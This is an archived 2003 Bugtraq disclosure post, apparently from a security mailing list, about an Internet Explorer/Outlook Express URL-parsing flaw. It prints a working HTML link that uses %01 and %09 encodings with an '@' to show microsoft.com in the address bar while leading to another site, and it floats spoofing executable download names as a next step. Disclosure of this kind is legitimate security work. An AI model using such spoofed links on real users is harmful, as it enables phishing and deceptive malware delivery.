[32780] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

RE: Internet Explorer URL parsing vulnerability

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Dec 10 15:34:13 2003

Message-Id: <200312092252.hB9Mq6ST012692@web6.megawebservers.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 9 Dec 2003 22:52:06 -0000
From: "http-equiv@excite.com" <1@malware.com>
Cc: <full-disclosure@lists.netsys.com>
Reply-To: 1@malware.com



The following works on Outlook Express 6 latest everything. Running 
on XP.

http://cert.uni-stuttgart.de/archive/bugtraq/2003/07/msg00249.html

09% pushes malware.com out of sight in the task bar, and %01 leaves 
microsoft.com intact in the address bar:

<A 
href="http://www.microsoft.com%01%09%09%09%09%09%09%
09@www.malware.com">religious 
software</A>

Certainly will add a new flavour to the ever increasing methods of 
trickery. Now all we need to do is spoof the file download name on 
an *.exe and away we go.


-- 
http://www.malware.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[32780] in bugtraq

RE: Internet Explorer URL parsing vulnerability

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)Wed Dec 10 15:34:13 2003

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Dec 10 15:34:13 2003